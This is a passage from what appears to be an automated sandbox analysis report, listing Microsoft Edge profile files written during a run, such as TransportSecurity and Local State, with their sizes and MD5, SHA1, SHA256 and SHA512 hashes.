                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            53b3c77db07264bf2f260fbf2f3b88787ec939b08e449af2a57c0c0b948ebb85ab0e1fa349bd2f3edb24bfecb66b83fe1586d6d21c6746e19eaaf0bdbe6184c0

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            2c5e67f0d5a257ac0502642d283607ec

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            318d198f2bf4f57df5d028d031ecbad2b89a15f6

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            37e56e16e42d906ed116697e837bec2278d890e6390f2bee89eca53461f1d5a0

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            44f399578af7200dc407c1b97843961ddbf4b9f8bc14125b84b2ee8660be2852ca110b996ae5bfea22f8e49931f032571816444f8735be8ce110268db79013fa

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            9b7e892aba04078ebc24c2caeb4a939f

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            751e7eb102230a2911e6edeb7c85f42dc8f9b07c

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            9380ba35b39fc23184f96f593a9289697c6044d6acba16b778601565197554d4

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            26efc3e10478cb07e6ceb8321b049355464d532e43fad5c9a42ebd45075b8b47a080db916b833c4eb872a089aeaead0984b8664b8e7baf2d5280bd11aaf92d31

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            f98d96209c9079955b22abe9c07a3d97

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            427af3267465173b76b0ece2437847680a4c1d63

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            b4c1aae111141390f040866f42f7631d58d8111d4a493ec10168bcd60ab326d6

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            1e8e4d6ed1f4e8903fc0f1f9fc593e7b41a4fddc49baecf73d7df29a7fccabee8d5f3fda02df3d3e5a3b2a343eda1658b605d75fa318db38aaf7924568665456

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            a4cb33714186279af2d15e8b00b73602

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            3b6fe91725e036c0c2114bfc8a3f8307e1529e59

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            7824c59d8695b7e42573fe9ed4c42b441b3a859ea6e57bbfed594392e1b3ae3b

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            1c6cc19ea09bbd854c999ceffed6ebd07b7e6b97144ff78c28de870e0d207b84ea8fc70a3c928f2015b8a9c26c916d657e567327b3d0997ecd5f09a12ba12a43

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            fc2d1c7cdaa3be321abce430e87f4d98

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            00a43b9edc1de7e1b8594afec87b19e5899b1d3a

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            00d980b498bea22358a1a8061b3cce5e9f131ca4f685d4f7c4a790a344f8cf25

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            904e9ef94bb1a60f9b566c82a84328423f5b02b2f85b29a4fb885d829122f37636e9342eeaa0da2da702f47455f3e465f8227dc25ea2706fb9249469938c907d

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            2a020570ae96452e4bcf8cafe9e4dd94

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            ea35726a5355d3e9f34b9ba47a0a99755ca6f1ea

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            8d051967f19eb578231b7fef99c8a2609895d8a627a42a9585b73b55193c1b63

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            6e43c57b069a01465dde95f02dd07f80d28830320a3b622b9947d43ffdc45808ff914595aa5438537b59b0c5421637abf1b3e49d7c983dfa3212cf06cf44b2f0

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            cde35bbd92f7c9e2941827e62c46a990

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            53a203ebd22b152855a179a46f502efdb187a477

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            4219d3bb46299dfc4186a32c0d79477a377b301e2c6a6a297c5a3c1887bfdae1

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            13e052894cc5215dc87b8656d1e6d63ca797f66161d0ab2b32d2d6f269e561dc321e24cfedd7087722912b178bd0203ccdf83cb60cdbb355f5d89bf5fbe6bf05

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            2959abb1e84e0e98bab6026241fcd602

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            bb5965bb123a0b05da6b6b2ab325216e4dfb5136

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            48bc0c312ee26df8d226efe13da09cfe3b806e476713e1f06f3c0e75f448c8ad

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            eb677c91fe3dca9feb77e01e7b0adf73613fd96c2909f7096086a0607a2e878a86fb1c3e98cae090ee14abb88688b0dc3cd82e62010d6395cda64e825bd422bc

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            793ef2f2290a506a733c574dbabd09f7

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            29fb914e77c96bd98ea8f06fef05a0cd47d6f881

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            c5353bf4e864452bf87aa874e41dc8d73964e22a4ba07faf9373aa3d9bdbd999

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            ce7d4bac918443f259e4cc7db1003fb28f505829a903fe056af2864a73e19d55696a58b95b82f978dfd262ccd3cdcbb82f6dcd878a0e71315ba146170bb8e807

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            264aeedf2d822570da1050e376ad8b2a

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            280ba8de7dd67f75fedd79c5caaed7e86c04fdb4

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            514d88be997a2e49f48316deed25f1d1ef55f3a78358bb5f59bb105de300e041

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            ae0b66fe6d5f1c623cff7d627c1c2aba4d9051c5556762de4178648d66bdfae622201172f67e5d04af6b5da9b2561c9009d2edea401ce878d690ef22500eb318

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            d05022ee64a0703a9065134f3027daa5

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            83b0531978d7523b0cf4a31ba9582110849a4dd3

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            4bb5c009f1ab950cc97b3004fe2ff24786003938a56901a831ab21a1076117c2

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            8f0372a89873c916ad2a2b1d7e3b0334a3b7f616ba5131a1cc6340a37d1825d5e8eb411e1bcafad6227cf57a59073ae338c55c2b021fe0dbfb8af6cc0bd52a1f

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            d5933b6b0fc46c39ef5397eb1c81dc1a

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            4301d8bdf2025e7921a9676513879bff36f5f2bd

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            74a1dcda0ae3e6fcb76db7f04b8410dcf3f5fbf20dd8bc1a1499f3e79ea4bf28

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            f8461b77567f9e2e08442d599dbc3e6a341298c6ea2719262db00bf7438d3c6121fbd1a6ef06f42ebfea6dde9d1625d0206751dab8a9b28a39f9119dbc8a4a2d

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            6dcdcc24ec052ae869ffe09d171b884d

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            0db130ef1d5e73e957a831a7d54ac9bf84d47337

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            3d442a5bc54a16bd76833a31704e06308bd28dbe0d5bd3e26aa7e7dd9deb051d

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            dfbe02064f22c7247e8923edbeb67eb02059eb2eb0f1d3224dbf761f1c10d8f06255b981262d5931a56c718a4c3891c2ab2f9c2eac190179720ee5cf4f06c011

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            c9fd1b7d706742e8a737ac770295f558

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            cef1ea68c88971db975ad26f2db748b6e965bbec

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            be4d7bf41a03676fed6c26819fe8ca45468ac549479556db52619b6e1e8e2b91

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            ffa7326580418247b68b12ba4b99c41e4e4292062e3cf5061b988242de414b38dc245284486a35694a7f009eed28ed77c6adc05ed9b5674aa78ebc2eebc1553a

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            62aaf3743d192db5e4ef5146c1800bc1

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            50b984b6126fcf5221eb7c093747e4797cd66976

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            3414ca5da1bcb968ebce6b3b149ebf3aca9ca2db105c965cb269d62abf805887

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            d80ff42e03983f032bec84334474b6784b92dead034a5a9a438c00782240f27fbeb0a11ad76c6b4b806c8e1d681772cab83b66d613bc8a6a830b87246840899c

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            4047f5cdbf74aadf833c03e52ec65b8d

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            d4acadded5cd7688cc338ff9b65c94e6e0330201

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            6c9b24774eecc3ff92d8bfd9cac9ed28c8c01f7c9677c285df7ace6b90330d97

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            9c3259725544b4c4be83745a9f0dfb29aad8a6b97a518d1f44628b49da966edddcd68a9131eeb80b7e7b41f5ae5f48424bf617414461d2971eeb74888647fa27

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            c8c7625444f3e405a64056ab679edbb4

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            d9daa6b759bf0db5a20752482c6c35d19f520d2b

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            a25453f6f0415281628c6f30890c257bbc9bc3d0d98dc25e66407f2c668b7ffd

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            44657cee9cb072efc5a1a4192b32edbd83d10943b9d74d174bf7299eeefd5d413d12c1819c8f9be37382dcf6f2e3dac91c889f5371d69b86ac5c8d81cdc6a1c6

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            cac72c29955e19b9e0c914cdc97ef370

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            0706e5221bc6a935c994de4c1a46efe212ce8314

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            c16934398ca763f2434f61325919373f73e8408e4027b215bd6b9695c39211b9

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            c347eecc0884c1ee0b12c7c715221ff76ac9300e0d9d069d0ce555d8e4ccdd172f058c8c15d05b9c7872c4a9f3830964032728a36d220878d029e41dd5ed30fb

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            ecbda3847aedc17e297a4abd864ea16e

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            91a011748615b7e359e66b634561771a492c86c5

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            d1f6b934ef40f7ac612455cfe27603b07fbe58ef70226511942d884e5539c30c

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            b49cb0b008b9013cd5ea39b3959f5029586594db91aa10d3a11cb8cbcee0fbd04f09e4557efa6894a1dc792facf4f6aed982b07f957152837e455b1fc1ee241e

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            5223fc24b158d568ad24a07099d6eb5d

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            e0a446c031f8878696ecd100d5f237ddb6c12559

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            8736f872e8a2a23841550f28eb0219b2b5afd868565944a7dd2ae00e4ae86c0a

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            f5a1be5409587d5057caac42d206ac55feb0a603e84642e7aa84b223d27d7c01403d2f93d19b85d020aaf2e16cd7612ed4ba60f0943283fc2f9a8f3d10b52054

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            3ffc129ff5aafcef7dcfdc5ddc0fc561

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            3d5c3abaf886512756e3eb6676ec4355edfcc3b1

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            c2b6f828fef69f554d38693228b5b725f84052fc0ab26c6328645f32e6deb287

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            d3895257802737d0cd7667eec2a2f016f69259bc5e4c7443c9cca91197110d849cf28f5cc7091e088e024adb25a55d342b1518e0d09b6b7a4479faaac56a86b3

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            940a7622063db410a3b407e6a0b5e690

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            655477a7244905026d959e794b505acf623a6ace

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            44815333b0ef3f40a129aa77e45d6449f0bb9db7aecf2f2590e6eaf3c1439a38

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            31a83d8be4568f9c9b54cc82d3ffd330411593470d179b9e4413e3f74c69768fbe3b49d396cc8a52796e87fd5172019fd93b307d926db32d058276786ad959ee

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            d9b40cfb68b9fff79f327caf3aa7b5b0

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            932394b00e91c4202dacfd9a0519318587a08c61

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            17ced5dda446ba7fa56098379dee8e795d571fca16eda6a82211e7cd40c522ff

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            aeff3639f6cb88a05150aa9875cd1af8f6cb9aa226aed220c9403ed5759aea7a023e425c4d007daf7620dfe8f84d7d771974808eab90c3fa2d6726ad556adfd8

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58db67.TMP

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            d4d58311cc34a4287b0b683bb8ecaf37

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            13c6d143b2a109eef3e164786e6c20613d716f6f

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            3953d2bdeeadc13ae78c9b15f0a045f00a7cb553efd29d80b4d7c6629c15faaf

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            ace9e0e65331a28873efa55673d6ed11388e35a039b82175acf71e2931d275f2a49ea5ac2ee168cd12c09f186752e090da81a9fc7039d8cff377ed56e9e21261

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            16B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            10KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            52814fa04ab6647dd45360c7e3954f2b

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            513d78ff209f826d284c73c2190ad71e04e7a60e

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            e9dacd0575f1e8f3a493b1cc1ea782b34134520ed41b672d90a99107286dd49c

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            a04c178064220c4949cd3d60a644e39c9b2f7ecf60303aee40bdb822f1e2ea0a67c3014d34c665553d6a8c452d40902dc931c235908b2c59a11f5fc30b591961

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            6b69330fee9b23f389f72553389b1f89

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            7be99d5cb75e0b96f257b9025bae3a413f5b15a3

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            738d017c1a7b15fe51c8536e4986336b2944be45d29a50c43acf16e7d2176de5

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            7dbea8ba911522f34ab315cbf6f6cc2cd10a5aad6e0b25970df4ad3d3d1277ed0063dbddf325e4f04699432d1d29585ed54b28b52d9bcd44f4a1af1c7b4c3957

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            a2c832b1238d796ce44f849008360db2

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            10a46562e65866b8799809033d19ca47dc1fdd5e

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            33a73d04079d161ee9cf34262f20d55c3c122d5de740d68e61ad6ffa8f98c9ec

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            af7942c3c8b8a04ea115c4c0475a639eba3df8b79a1e7b183447a30fc0508e58c56e2112f237f092404aa3b37e5887bef9fafb5e16c57d43788f08b50fc90c4c

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            95b277f6a5b70069e0f17de528d70161

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            7f7a84fec32741312482062ee45d2ea7becdaf36

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            d88929eaeff20d997b26fd1e55ccfc5378b18b711fdfacaa6003ff633dd3086c

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            c70e5599ea04359217227c96e6a05b9e6cfceec52b3cef07bfa0f101db429a18f89a22664118ab15e82dc2c5192b99020dd9296a40de0b47e8502de0e919af7d

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            4094e96aae5e9469014d81b8a999422c

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            a347f18a88eac322d18fef86d16f2e567e5de0ad

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            96b994d8c6219a1c6284df0e09febaecf4b7794e1d81682fbc67a572361e6e01

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            04713bf87ddc61ae6da169be25272ead3663c384b4906fba9ff9181f0db23bf285c329ac33e417dfb08e66605c93f72820a72dd29a7e0fd389046b1bba277116

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            257424520e894b89464c1081fbce6e2e

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            29179199a5cf7006b73c292aea882d22e1166613

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            949f3d10903342b6d273ee4573a859cb2c83f1d87f1dfb3694430e822821a3a2

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            87f8b66b929c4ea0eb1bbc4300e728a098298b4679f9ddc016c5bebd748ab8ef21aca8cc8cd6564923ef8773331749190623c59c28b19c022d1416e9c8011689

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            5b209155da0f0cfda489d0185af96194

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            c42ff36d9905e197900b776f64712f0b16fd2de2

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            39598d928b01a55513dc723d938e1ca0e6ac3a6d38bb7b2a354766162eb182ea

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            3ee084fb68846a820b3c012d026fd0efc70e0eff889311e3e9210275bae9f3b354dc3425d97352dfc97ffaca3c2536a1b9de0220fea35da18f3a8612bc5b6230

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            e3004aa4a745d1076025be75d1eac48b

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            041a9371e18b375dc2abbdd9043b9fabcf550aa0

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            7aae7563551b201be24cb2b70f442c3b797bad549d35683aff6ba42aee018e12

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            d2917428274252b2505ffb40ab76fefdc4a3737f76679b1f8e78d488527b91c750495bb4ecb7e4ae2046746c12ee00ca745241434e853551927cded2ead9d7aa

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            431949c0278c23f5cb466c315326d5f1

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            c0aeb3a6411a248678d85fc1f5b6089507de7c3d

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            738b4a6ef15c6872f72c97a7da33215876b2ad64332c8abb23d91f0a711cfde7

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            10346a121dda07bc0cb1f82997127a6eed9be74206083e35724d7b28e10b07fbf637221c1a47ba47b0f6cb3a7ad05f15b068f6c6a359cedb154693368eeafa14

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            2687330a9428d49fb26d372872c3fa92

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            766257aa9fd0e3ba0431f61fe3f171b26c4f3307

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            fca3aa0ff5120fcc2ef4b0ab70b06d5beea66fd7de35c94799872622495d333e

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            52097ed032e71783b46f2f7fc06f4155bf8ac9d29b9c0d4948577b198c00bdf6db8f8438f2f3865b7d245a16aab7170d6e4abdbc7fae3c1f1fa220e756216243

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            896KB

